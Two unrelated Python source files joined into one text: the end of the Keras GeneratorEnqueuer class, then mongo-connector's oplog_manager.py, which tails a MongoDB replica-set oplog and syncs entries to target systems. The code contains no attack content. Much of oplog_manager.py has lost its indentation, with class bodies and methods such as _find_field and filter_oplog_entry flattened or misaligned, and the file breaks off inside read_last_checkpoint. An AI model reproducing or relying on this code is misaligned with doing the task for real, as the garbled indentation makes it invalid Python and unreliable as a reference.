
        Arguments:
            timeout: maximum time to wait on `thread.join()`
        """
        self.stop_signal.set()
        with self.queue.mutex:
            self.queue.queue.clear()
            self.queue.unfinished_tasks = 0
            self.queue.not_full.notify()
        self.run_thread.join(timeout)
        _SHARED_SEQUENCES[self.uid] = None
@tf_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
    """Builds a queue out of a data generator.

    The provided generator can be finite, in which case iteration over
    `get()` simply ends once the generator is exhausted.

    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    Arguments:
        generator: a generator function which yields data
        use_multiprocessing: use multiprocessing if True, otherwise threading
        wait_time: time to sleep in-between calls to `put()`
        seed: Initial seed for workers,
            will be incremented by one for each worker.
    """

    def __init__(self,
                 generator,
                 use_multiprocessing=False,
                 wait_time=0.05,
                 seed=None):
        self.wait_time = wait_time
        self._generator = generator
        # Use value comparison (`==`/truthiness), not `is`: identity
        # comparison against string/bool literals is implementation
        # dependent and raises SyntaxWarning on modern CPython.
        if os.name == 'nt' and use_multiprocessing:
            # On Windows, avoid **SYSTEMATIC** error in `multiprocessing`:
            # `TypeError: can't pickle generator objects`
            # => Suggest multithreading instead of multiprocessing on Windows
            raise ValueError('Using a generator with `use_multiprocessing=True`'
                             ' is not supported on Windows (no marshalling of'
                             ' generators across process boundaries). Instead,'
                             ' use single thread/process or multithreading.')
        else:
            self._use_multiprocessing = use_multiprocessing
        self._threads = []
        self._stop_event = None
        self._manager = None
        self.queue = None
        self.seed = seed

    def _data_generator_task(self):
        """Worker loop: move items from the generator into the queue."""
        if not self._use_multiprocessing:
            while not self._stop_event.is_set():
                with self.genlock:
                    try:
                        if (self.queue is not None and
                                self.queue.qsize() < self.max_queue_size):
                            # On all OSes, avoid **SYSTEMATIC** error
                            # in multithreading mode:
                            # `ValueError: generator already executing`
                            # => Serialize calls to
                            # infinite iterator/generator's next() function
                            generator_output = next(self._generator)
                            self.queue.put((True, generator_output))
                        else:
                            time.sleep(self.wait_time)
                    except StopIteration:
                        break
                    except Exception as e:  # pylint: disable=broad-except
                        # Can't pickle tracebacks.
                        # As a compromise, print the traceback and pickle None instead.
                        if not hasattr(e, '__traceback__'):
                            setattr(e, '__traceback__', sys.exc_info()[2])
                        self.queue.put((False, e))
                        self._stop_event.set()
                        break
        else:
            while not self._stop_event.is_set():
                try:
                    if (self.queue is not None and
                            self.queue.qsize() < self.max_queue_size):
                        generator_output = next(self._generator)
                        self.queue.put((True, generator_output))
                    else:
                        time.sleep(self.wait_time)
                except StopIteration:
                    break
                except Exception as e:  # pylint: disable=broad-except
                    # Can't pickle tracebacks.
                    # As a compromise, print the traceback and pickle None instead.
                    traceback.print_exc()
                    setattr(e, '__traceback__', None)
                    self.queue.put((False, e))
                    self._stop_event.set()
                    break

    def start(self, workers=1, max_queue_size=10):
        """Kicks off threads which add data from the generator into the queue.

        Arguments:
            workers: number of worker threads
            max_queue_size: queue size
                (when full, threads could block on `put()`)
        """
        try:
            self.max_queue_size = max_queue_size
            if self._use_multiprocessing:
                self._manager = multiprocessing.Manager()
                self.queue = self._manager.Queue(maxsize=max_queue_size)
                self._stop_event = multiprocessing.Event()
            else:
                # On all OSes, avoid **SYSTEMATIC** error in multithreading mode:
                # `ValueError: generator already executing`
                # => Serialize calls to infinite iterator/generator's next() function
                self.genlock = threading.Lock()
                self.queue = queue.Queue(maxsize=max_queue_size)
                self._stop_event = threading.Event()

            for _ in range(workers):
                if self._use_multiprocessing:
                    # Reset random seed else all children processes
                    # share the same seed
                    np.random.seed(self.seed)
                    thread = multiprocessing.Process(target=self._data_generator_task)
                    thread.daemon = True
                    if self.seed is not None:
                        self.seed += 1
                else:
                    thread = threading.Thread(target=self._data_generator_task)
                self._threads.append(thread)
                thread.start()
        except:
            # Deliberately broad: tear down whatever was started, then
            # re-raise the original error unchanged.
            self.stop()
            raise

    def is_running(self):
        return self._stop_event is not None and not self._stop_event.is_set()

    def stop(self, timeout=None):
        """Stops running threads and wait for them to exit, if necessary.

        Should be called by the same thread which called `start()`.

        Arguments:
            timeout: maximum time to wait on `thread.join()`.
        """
        if self.is_running():
            self._stop_event.set()
        for thread in self._threads:
            if self._use_multiprocessing:
                if thread.is_alive():
                    thread.terminate()
            else:
                # The thread.is_alive() test is subject to a race condition:
                # the thread could terminate right after the test and before the
                # join, rendering this test meaningless -> Call thread.join()
                # always, which is ok no matter what the status of the thread.
                thread.join(timeout)
        if self._manager:
            self._manager.shutdown()

        self._threads = []
        self._stop_event = None
        self.queue = None

    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        Yields:
            The next element in the queue, i.e. a tuple
            `(inputs, targets)` or
            `(inputs, targets, sample_weights)`.
        """
        while self.is_running():
            if not self.queue.empty():
                success, value = self.queue.get()
                # Rethrow any exceptions found in the queue
                if not success:
                    six.reraise(value.__class__, value, value.__traceback__)
                # Yield regular values
                if value is not None:
                    yield value
            else:
                all_finished = all([not thread.is_alive() for thread in self._threads])
                if all_finished and self.queue.empty():
                    # Under PEP 479 (Python 3.7+) `raise StopIteration`
                    # inside a generator becomes a RuntimeError; a plain
                    # return ends the generator cleanly instead.
                    return
                time.sleep(self.wait_time)

        # Make sure to rethrow the first exception in the queue, if any
        while not self.queue.empty():
            success, value = self.queue.get()
            if not success:
                six.reraise(value.__class__, value, value.__traceback__)
|
oplog_manager.py | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType, errors as pymongo_errors
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
    """Daemon thread that periodically logs the current replication lag."""

    def __init__(self, opman, interval):
        super(ReplicationLagLogger, self).__init__()
        self.opman = opman
        self.interval = interval
        self.daemon = True

    def log_replication_lag(self):
        """Log how far the OplogThread's checkpoint trails the oplog."""
        checkpoint = self.opman.checkpoint
        if checkpoint is None:
            return
        newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
        if newest_write < checkpoint:
            # A rollback is about to happen; do not log anything.
            return
        lag_secs = newest_write.time - checkpoint.time
        if lag_secs > 0:
            LOG.info("OplogThread for replica set '%s' is %s seconds behind "
                     "the oplog.",
                     self.opman.replset_name, lag_secs)
            return
        # Same second: compare the increment counters instead.
        lag_inc = newest_write.inc - checkpoint.inc
        if lag_inc > 0:
            LOG.info("OplogThread for replica set '%s' is %s entries "
                     "behind the oplog.",
                     self.opman.replset_name, lag_inc)
        else:
            LOG.info("OplogThread for replica set '%s' is up to date "
                     "with the oplog.",
                     self.opman.replset_name)

    def run(self):
        """Log the lag every `interval` seconds while the OplogThread lives."""
        while self.opman.is_alive():
            self.log_replication_lag()
            time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(self, primary_client, doc_managers,
             oplog_progress_dict, namespace_config,
             mongos_client=None, **kwargs):
    """Set up a thread that tails one replica set's oplog.

    Arguments:
        primary_client: Connection to the primary of this replica set.
        doc_managers: DocManager instances, one per target system.
        oplog_progress_dict: Shared mapping of OplogThread -> last
            checkpoint timestamp.  # presumably a LockingDict — verify against caller
        namespace_config: Namespace configuration used to include,
            exclude, and rename namespaces.
        mongos_client: Optional connection to a mongos (sharded setups).
        **kwargs: Recognized keys: 'batch_size', 'collection_dump',
            'continue_on_error'.
    """
    super(OplogThread, self).__init__()
    self.batch_size = kwargs.get('batch_size', DEFAULT_BATCH_SIZE)
    # The connection to the primary for this replicaSet.
    self.primary_client = primary_client
    # The connection to the mongos, if there is one.
    self.mongos_client = mongos_client
    # Are we allowed to perform a collection dump?
    self.collection_dump = kwargs.get('collection_dump', True)
    # The document manager for each target system.
    # These are the same for all threads.
    self.doc_managers = doc_managers
    # Boolean describing whether or not the thread is running.
    self.running = True
    # Stores the timestamp of the last oplog entry read.
    self.checkpoint = None
    # A dictionary that stores OplogThread/timestamp pairs.
    # Represents the last checkpoint for a OplogThread.
    self.oplog_progress = oplog_progress_dict
    # The namespace configuration
    self.namespace_config = namespace_config
    # Whether the collection dump gracefully handles exceptions
    self.continue_on_error = kwargs.get('continue_on_error', False)
    LOG.info('OplogThread: Initializing oplog thread')
    # The standard replica-set oplog collection.
    self.oplog = self.primary_client.local.oplog.rs
    self.replset_name = (
        self.primary_client.admin.command('ismaster')['setName'])
    if not self.oplog.find_one():
        # Empty oplog: warn but keep the thread alive — entries may
        # appear later.
        err_msg = 'OplogThread: No oplog for thread:'
        LOG.warning('%s %s' % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
    """Determine if this oplog entry should be skipped.

    Returns a tuple ``(skip, is_gridfs_file)``.

    This has the possible side effect of modifying the entry's namespace
    and filtering fields from updates and inserts.
    """
    # Don't replicate entries resulting from chunk moves
    if entry.get("fromMigrate"):
        return True, False
    # Ignore no-ops
    if entry['op'] == 'n':
        return True, False
    ns = entry['ns']
    if '.' not in ns:
        # Not a "<db>.<collection>" namespace; nothing to replicate.
        return True, False
    coll = ns.split('.', 1)[1]
    # Ignore system collections
    if coll.startswith("system."):
        return True, False
    # Ignore GridFS chunks
    if coll.endswith('.chunks'):
        return True, False
    is_gridfs_file = False
    if coll.endswith(".files"):
        # Strip the ".files" suffix to recover the GridFS namespace.
        ns = ns[:-len(".files")]
        if self.namespace_config.gridfs_namespace(ns):
            is_gridfs_file = True
        else:
            return True, False
    # Commands should not be ignored, filtered, or renamed. Renaming is
    # handled by the DocManagers via the CommandHelper class.
    if coll == "$cmd":
        return False, False
    # Rename or filter out namespaces that are ignored keeping
    # included gridfs namespaces.
    namespace = self.namespace_config.lookup(ns)
    if namespace is None:
        LOG.debug("OplogThread: Skipping oplog entry: "
                  "'%s' is not in the namespace configuration." % (ns,))
        return True, False
    # Update the namespace.
    entry['ns'] = namespace.dest_name
    # Take fields out of the oplog entry that shouldn't be replicated.
    # This may nullify the document if there's nothing to do.
    if not self.filter_oplog_entry(
            entry, include_fields=namespace.include_fields,
            exclude_fields=namespace.exclude_fields,
            include_filter=namespace.include_filter):
        return True, False
    return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
    """Start the oplog worker.

    Main loop: obtain a cursor positioned at the checkpoint, replay each
    relevant oplog entry against every DocManager, and periodically
    persist the checkpoint. Loops until `join()` clears `self.running`
    or recovery becomes impossible.
    """
    ReplicationLagLogger(self, 30).start()
    LOG.debug("OplogThread: Run thread started")
    while self.running is True:
        LOG.debug("OplogThread: Getting cursor")
        cursor, cursor_empty = retry_until_ok(self.init_cursor)
        # we've fallen too far behind
        if cursor is None and self.checkpoint is not None:
            err_msg = "OplogThread: Last entry no longer in oplog"
            effect = "cannot recover!"
            LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
            self.running = False
            continue

        if cursor_empty:
            LOG.debug("OplogThread: Last entry is the one we "
                      "already processed.  Up to date.  Sleeping.")
            time.sleep(1)
            continue

        last_ts = None
        remove_inc = 0
        upsert_inc = 0
        update_inc = 0
        try:
            LOG.debug("OplogThread: about to process new oplog entries")
            while cursor.alive and self.running:
                LOG.debug("OplogThread: Cursor is still"
                          " alive and thread is still running.")
                for n, entry in enumerate(cursor):
                    # Break out if this thread should stop
                    if not self.running:
                        break

                    LOG.debug("OplogThread: Iterating through cursor,"
                              " document number in this cursor is %d"
                              % n)

                    skip, is_gridfs_file = self._should_skip_entry(entry)
                    if skip:
                        # update the last_ts on skipped entries to ensure
                        # our checkpoint does not fall off the oplog. This
                        # also prevents reprocessing skipped entries.
                        last_ts = entry['ts']
                        continue

                    # Sync the current oplog operation
                    operation = entry['op']
                    ns = entry['ns']
                    timestamp = util.bson_ts_to_long(entry['ts'])
                    for docman in self.doc_managers:
                        try:
                            LOG.debug("OplogThread: Operation for this "
                                      "entry is %s" % str(operation))

                            # Remove
                            if operation == 'd':
                                docman.remove(
                                    entry['o']['_id'], ns, timestamp)
                                remove_inc += 1

                            # Insert
                            elif operation == 'i':  # Insert
                                # Retrieve inserted document from
                                # 'o' field in oplog record
                                doc = entry.get('o')
                                # Extract timestamp and namespace
                                if is_gridfs_file:
                                    db, coll = ns.split('.', 1)
                                    gridfile = GridFSFile(
                                        self.primary_client[db][coll],
                                        doc)
                                    docman.insert_file(
                                        gridfile, ns, timestamp)
                                else:
                                    docman.upsert(doc, ns, timestamp)
                                upsert_inc += 1

                            # Update
                            elif operation == 'u':
                                docman.update(entry['o2']['_id'],
                                              entry['o'],
                                              ns, timestamp)
                                update_inc += 1

                            # Command
                            elif operation == 'c':
                                # use unmapped namespace
                                doc = entry.get('o')
                                docman.handle_command(doc,
                                                      entry['ns'],
                                                      timestamp)

                        except errors.OperationFailed:
                            LOG.exception(
                                "Unable to process oplog document %r"
                                % entry)
                        except errors.ConnectionFailed:
                            LOG.exception(
                                "Connection failed while processing oplog "
                                "document %r" % entry)

                    if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
                        LOG.debug(
                            "OplogThread: Documents removed: %d, "
                            "inserted: %d, updated: %d so far" % (
                                remove_inc, upsert_inc, update_inc))

                    LOG.debug("OplogThread: Doc is processed.")

                    last_ts = entry['ts']

                    # update timestamp per batch size
                    # n % -1 (default for self.batch_size) == 0 for all n
                    # NOTE(review): the comment above describes "== 0" but
                    # the code tests "== 1" — confirm which is intended.
                    if n % self.batch_size == 1:
                        self.update_checkpoint(last_ts)
                        last_ts = None

                # update timestamp after running through oplog
                if last_ts is not None:
                    LOG.debug("OplogThread: updating checkpoint after "
                              "processing new oplog entries")
                    self.update_checkpoint(last_ts)

        except (pymongo.errors.AutoReconnect,
                pymongo.errors.OperationFailure,
                pymongo.errors.ConfigurationError):
            LOG.exception(
                "Cursor closed due to an exception. "
                "Will attempt to reconnect.")

        # update timestamp before attempting to reconnect to MongoDB,
        # after being join()'ed, or if the cursor closes
        if last_ts is not None:
            LOG.debug("OplogThread: updating checkpoint after an "
                      "Exception, cursor closing, or join() on this"
                      "thread.")
            self.update_checkpoint(last_ts)

        LOG.debug("OplogThread: Sleeping. Documents removed: %d, "
                  "upserted: %d, updated: %d"
                  % (remove_inc, upsert_inc, update_inc))
        time.sleep(2)
def join(self):
    """Ask this thread to stop tailing the oplog, then wait for it."""
    LOG.debug("OplogThread: exiting due to join call.")
    # Clearing the flag makes the run() loop exit at its next check.
    self.running = False
    super(OplogThread, self).join()
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split('.')
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
    """Find the fields in the update document which match the given field.

    Both the field and the top level keys in the doc may be in dot
    notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
    the empty list if the field is not present.
    """
    def find_partial_matches():
        # Scan top-level keys for dotted-prefix overlap with `field`.
        for key in doc:
            if len(key) > len(field):
                # Handle case where field is a prefix of key, eg field is
                # 'a' and key is 'a.b'.
                if key.startswith(field) and key[len(field)] == '.':
                    yield [key], doc[key]
                    # Continue searching, there may be multiple matches.
                    # For example, field 'a' should match 'a.b' and 'a.c'.
            elif len(key) < len(field):
                # Handle case where key is a prefix of field, eg field is
                # 'a.b' and key is 'a'.
                if field.startswith(key) and field[len(key)] == '.':
                    # Search for the remaining part of the field
                    matched = cls._find_field(field[len(key) + 1:],
                                              doc[key])
                    if matched:
                        # Add the top level key to the path.
                        match = matched[0]
                        match[0].insert(0, key)
                        yield match
                    # Stop searching, it's not possible for any other
                    # keys in the update doc to match this field.
                    return

    try:
        # Fast path: the field exactly matches a top-level key.
        return [([field], doc[field])]
    except KeyError:
        # Field does not exactly match any key in the update doc.
        return list(find_partial_matches())
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def _apply_include_filter(self, doc, include_fields, update=False):
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# if field exists but has the wrong value, return false so the doc will be dropped
if value != include_fields[field]:
return False
# did not find any field with a wrong value, returning true so the doc will be passed
return True
def filter_oplog_entry(self, entry, include_fields=None,
exclude_fields=None,
include_filter=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry['o']
if include_filter is not None:
should_continue = self._apply_include_filter(entry_o, include_filter)
if not should_continue:
return None
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
entry['o'] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry['op'] == 'u' and ('$set' in entry_o or '$unset' in entry_o):
if '$set' in entry_o:
entry['o']["$set"] = filter_fields(
entry_o["$set"], fields, update=True)
if '$unset' in entry_o:
entry['o']["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o['$set']:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o['$unset']:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry['op'] == 'u':
entry['o'] = filter_fields(entry_o, fields)
return entry
def get_oplog_cursor(self, timestamp=None):
    """Get a cursor to the oplog after the given timestamp, excluding
    no-op entries.

    If no timestamp is specified, returns a cursor to the entire oplog.
    """
    query = {'op': {'$ne': 'n'}}
    if timestamp is not None:
        query['ts'] = {'$gte': timestamp}
        return self.oplog.find(
            query,
            cursor_type=CursorType.TAILABLE_AWAIT,
            oplog_replay=True)
    return self.oplog.find(
        query,
        cursor_type=CursorType.TAILABLE_AWAIT)
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split('.', 1)
return self.primary_client[database][coll]
def dump_collection(self):
    """Dumps collection into the target system.

    This method is called when we're initializing the cursor and have no
    configs i.e. when we're starting for the first time.

    Returns the oplog timestamp the dump corresponds to, or None when
    the oplog is empty, the dump failed, or the dump was cancelled.
    """
    timestamp = retry_until_ok(self.get_last_oplog_timestamp)
    if timestamp is None:
        return None
    long_ts = util.bson_ts_to_long(timestamp)
    # Flag if this oplog thread was cancelled during the collection dump.
    # Use a list to workaround python scoping.
    dump_cancelled = [False]

    def get_all_ns():
        # Collect the (regular, gridfs) namespaces eligible for dumping.
        ns_set = []
        gridfs_ns_set = []
        db_list = self.namespace_config.get_included_databases()
        if not db_list:
            # Only use listDatabases when the configured databases are not
            # explicit.
            db_list = retry_until_ok(self.primary_client.database_names)
        for database in db_list:
            if database == "config" or database == "local":
                continue
            coll_list = retry_until_ok(
                self.primary_client[database].collection_names)
            for coll in coll_list:
                # ignore system collections
                if coll.startswith("system."):
                    continue
                # ignore gridfs chunks collections
                if coll.endswith(".chunks"):
                    continue
                if coll.endswith(".files"):
                    namespace = "%s.%s" % (database, coll)
                    namespace = namespace[:-len(".files")]
                    if self.namespace_config.gridfs_namespace(namespace):
                        gridfs_ns_set.append(namespace)
                else:
                    namespace = "%s.%s" % (database, coll)
                    if self.namespace_config.map_namespace(namespace):
                        ns_set.append(namespace)
        return ns_set, gridfs_ns_set

    dump_set, gridfs_dump_set = get_all_ns()
    LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)

    def docs_to_dump(from_coll, namespace=None):
        # Yield every document of `from_coll`, resuming after the last
        # seen _id on connection errors (up to 60 attempts).
        last_id = None
        attempts = 0
        projection = self.namespace_config.projection(from_coll.full_name)
        namespaceconfig = None
        if namespace is not None:
            namespaceconfig = self.namespace_config.lookup(namespace)
        # Loop to handle possible AutoReconnect
        while attempts < 60:
            if last_id is None:
                cursor = retry_until_ok(
                    from_coll.find,
                    projection=projection,
                    sort=[("_id", pymongo.ASCENDING)]
                )
            else:
                cursor = retry_until_ok(
                    from_coll.find,
                    {"_id": {"$gt": last_id}},
                    projection=projection,
                    sort=[("_id", pymongo.ASCENDING)]
                )
            try:
                for doc in cursor:
                    if not self.running:
                        # Thread was joined while performing the
                        # collection dump. Plain `return` ends the
                        # generator: `raise StopIteration` here would
                        # become a RuntimeError under PEP 479 (Py 3.7+).
                        dump_cancelled[0] = True
                        return
                    if namespaceconfig is not None and namespaceconfig.include_filter is not None:
                        should_continue = self._apply_include_filter(doc, namespaceconfig.include_filter)
                        if not should_continue:
                            continue
                    last_id = doc["_id"]
                    yield doc
                break
            except (pymongo.errors.AutoReconnect,
                    pymongo.errors.OperationFailure):
                attempts += 1
                time.sleep(1)

    def upsert_each(dm):
        # Fallback path: upsert documents one at a time so a single bad
        # document does not abort the dump when continue_on_error is set.
        num_failed = 0
        for namespace in dump_set:
            from_coll = self.get_collection(namespace)
            mapped_ns = self.namespace_config.map_namespace(namespace)
            total_docs = retry_until_ok(from_coll.count)
            num = None
            for num, doc in enumerate(docs_to_dump(from_coll, namespace)):
                try:
                    dm.upsert(doc, mapped_ns, long_ts)
                except Exception:
                    if self.continue_on_error:
                        LOG.exception(
                            "Could not upsert document: %r" % doc)
                        num_failed += 1
                    else:
                        raise
                if num % 10000 == 0:
                    LOG.info("Upserted %d out of approximately %d docs "
                             "from collection '%s'",
                             num + 1, total_docs, namespace)
            if num is not None:
                LOG.info("Upserted %d out of approximately %d docs from "
                         "collection '%s'",
                         num + 1, total_docs, namespace)
        if num_failed > 0:
            LOG.error("Failed to upsert %d docs" % num_failed)

    def upsert_all(dm):
        # Preferred path: hand the whole stream to the DocManager's bulk
        # API; fall back to per-document upserts on error if allowed.
        try:
            for namespace in dump_set:
                from_coll = self.get_collection(namespace)
                total_docs = retry_until_ok(from_coll.count)
                mapped_ns = self.namespace_config.map_namespace(
                    namespace)
                LOG.info("[%s] Bulk upserting approximately %d docs from "
                         "collection '%s'",
                         self.replset_name, total_docs, namespace)
                dm.bulk_upsert(docs_to_dump(from_coll, namespace),
                               mapped_ns, long_ts)
        except Exception:
            if self.continue_on_error:
                LOG.exception("OplogThread: caught exception"
                              " during bulk upsert, re-upserting"
                              " documents serially")
                upsert_each(dm)
            else:
                raise

    def do_dump(dm, error_queue):
        try:
            LOG.debug("OplogThread: Using bulk upsert function for "
                      "collection dump")
            upsert_all(dm)

            if gridfs_dump_set:
                LOG.info("OplogThread: dumping GridFS collections: %s",
                         gridfs_dump_set)

                # Dump GridFS files
                for gridfs_ns in gridfs_dump_set:
                    mongo_coll = self.get_collection(gridfs_ns)
                    from_coll = self.get_collection(gridfs_ns + '.files')
                    dest_ns = self.namespace_config.map_namespace(gridfs_ns)
                    for doc in docs_to_dump(from_coll, gridfs_ns):
                        gridfile = GridFSFile(mongo_coll, doc)
                        dm.insert_file(gridfile, dest_ns, long_ts)
            LOG.info("OplogThread [%s]: collection dump completed", self.replset_name)
        except:
            # Deliberately bare: this may run in a worker thread, and any
            # failure (including BaseException) must be recorded so the
            # dump is marked unsuccessful rather than silently partial.
            # Likely exceptions:
            # pymongo.errors.OperationFailure,
            # mongo_connector.errors.ConnectionFailed
            # mongo_connector.errors.OperationFailed
            error_queue.put(sys.exc_info())

    # Extra threads (if any) that assist with collection dumps
    dumping_threads = []
    # Did the dump succeed for all target systems?
    dump_success = True
    # Holds any exceptions we can't recover from. (Renamed from `errors`,
    # which shadowed the module-level `errors` import.)
    exc_queue = queue.Queue()
    if len(self.doc_managers) == 1:
        do_dump(self.doc_managers[0], exc_queue)
    else:
        # Slight performance gain breaking dump into separate
        # threads if > 1 replication target
        for dm in self.doc_managers:
            t = threading.Thread(target=do_dump, args=(dm, exc_queue))
            dumping_threads.append(t)
            t.start()
        # cleanup
        for t in dumping_threads:
            t.join()

    # Print caught exceptions
    try:
        while True:
            LOG.critical('Exception during collection dump',
                         exc_info=exc_queue.get_nowait())
            dump_success = False
    except queue.Empty:
        pass

    if not dump_success:
        err_msg = "OplogThread: Failed during dump collection"
        effect = "cannot recover!"
        LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
        self.running = False
        return None

    if dump_cancelled[0]:
        LOG.warning('Initial collection dump was interrupted. '
                    'Will re-run the collection dump on next startup.')
        return None

    return timestamp
def _get_oplog_timestamp(self, newest_entry):
    """Return the timestamp of the latest or earliest entry in the oplog.

    Arguments:
        newest_entry: True for the newest entry, False for the oldest.

    Returns None when the oplog contains no non-noop entries.
    """
    if newest_entry:
        sort_order = pymongo.DESCENDING
    else:
        sort_order = pymongo.ASCENDING
    cursor = self.oplog.find({'op': {'$ne': 'n'}}).sort(
        '$natural', sort_order
    ).limit(-1)
    try:
        ts = next(cursor)['ts']
    except StopIteration:
        LOG.debug("OplogThread: oplog is empty.")
        return None
    LOG.debug("OplogThread: %s oplog entry has timestamp %s."
              % ('Newest' if newest_entry else 'Oldest', ts))
    return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
    """Return True when `cursor` has no documents to yield."""
    # Tailable cursors can not have singleBatch=True in MongoDB > 3.3
    probe = (cursor.clone()
             .remove_option(CursorType.TAILABLE_AWAIT)
             .limit(-1))
    try:
        next(probe)
    except StopIteration:
        return True
    return False
def init_cursor(self):
    """Position the cursor appropriately.

    The cursor is set to either the beginning of the oplog, or
    wherever it was last left off.

    Returns the cursor and True if the cursor is empty.
    """
    timestamp = self.read_last_checkpoint()
    if timestamp is None:
        if self.collection_dump:
            # dump collection and update checkpoint
            timestamp = self.dump_collection()
            self.update_checkpoint(timestamp)
            if timestamp is None:
                # Dump failed, was cancelled, or the oplog is empty:
                # nothing to tail yet.
                return None, True
        else:
            # Collection dump disabled:
            # Return cursor to beginning of oplog but do not set the
            # checkpoint. The checkpoint will be set after an operation
            # has been applied.
            cursor = self.get_oplog_cursor()
            return cursor, self._cursor_empty(cursor)

    cursor = self.get_oplog_cursor(timestamp)
    cursor_empty = self._cursor_empty(cursor)

    if cursor_empty:
        # rollback, update checkpoint, and retry
        LOG.debug("OplogThread: Initiating rollback from "
                  "get_oplog_cursor")
        self.update_checkpoint(self.rollback())
        return self.init_cursor()

    first_oplog_entry = next(cursor)

    oldest_ts_long = util.bson_ts_to_long(
        self.get_oldest_oplog_timestamp())
    checkpoint_ts_long = util.bson_ts_to_long(timestamp)
    if checkpoint_ts_long < oldest_ts_long:
        # We've fallen behind, the checkpoint has fallen off the oplog
        return None, True

    cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
    if cursor_ts_long > checkpoint_ts_long:
        # The checkpoint is not present in this oplog and the oplog
        # did not rollover. This means that we connected to a new
        # primary which did not replicate the checkpoint and which has
        # new changes in its oplog for us to process.
        # rollback, update checkpoint, and retry
        LOG.debug("OplogThread: Initiating rollback from "
                  "get_oplog_cursor: new oplog entries found but "
                  "checkpoint is not present")
        self.update_checkpoint(self.rollback())
        return self.init_cursor()

    # first entry has been consumed
    return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
    """Store the current checkpoint in the oplog progress dictionary.

    A no-op (with a debug message) when the checkpoint is None or has
    not changed since the last update.
    """
    if checkpoint is None or checkpoint == self.checkpoint:
        LOG.debug("OplogThread: no checkpoint to update.")
        return

    self.checkpoint = checkpoint
    with self.oplog_progress as progress:
        progress_dict = progress.get_dict()
        # If we have the repr of our oplog collection
        # in the dictionary, remove it and replace it
        # with our replica set name.
        # This allows an easy upgrade path from mongo-connector 2.3.
        # For an explanation of the format change, see the comment in
        # read_last_checkpoint.
        progress_dict.pop(str(self.oplog), None)
        progress_dict[self.replset_name] = checkpoint
        LOG.debug("OplogThread: oplog checkpoint updated to %s",
                  checkpoint)
def read_last_checkpoint(self):
    """Read the last checkpoint from the oplog progress dictionary.

    Returns the stored checkpoint (or None if absent) and caches it on
    self.checkpoint.
    """
    # In versions of mongo-connector 2.3 and before,
    # we used the repr of the
    # oplog collection as keys in the oplog_progress dictionary.
    # In versions thereafter, we use the replica set name. For backwards
    # compatibility, we check for both.
    oplog_str = str(self.oplog)

    with self.oplog_progress as oplog_prog:
        oplog_dict = oplog_prog.get_dict()
        # Prefer the new-format key (replica set name); fall back to the
        # legacy key (repr of the oplog collection). Flat .get() chain
        # replaces the original nested try/except KeyError.
        ret_val = oplog_dict.get(self.replset_name,
                                 oplog_dict.get(oplog_str))

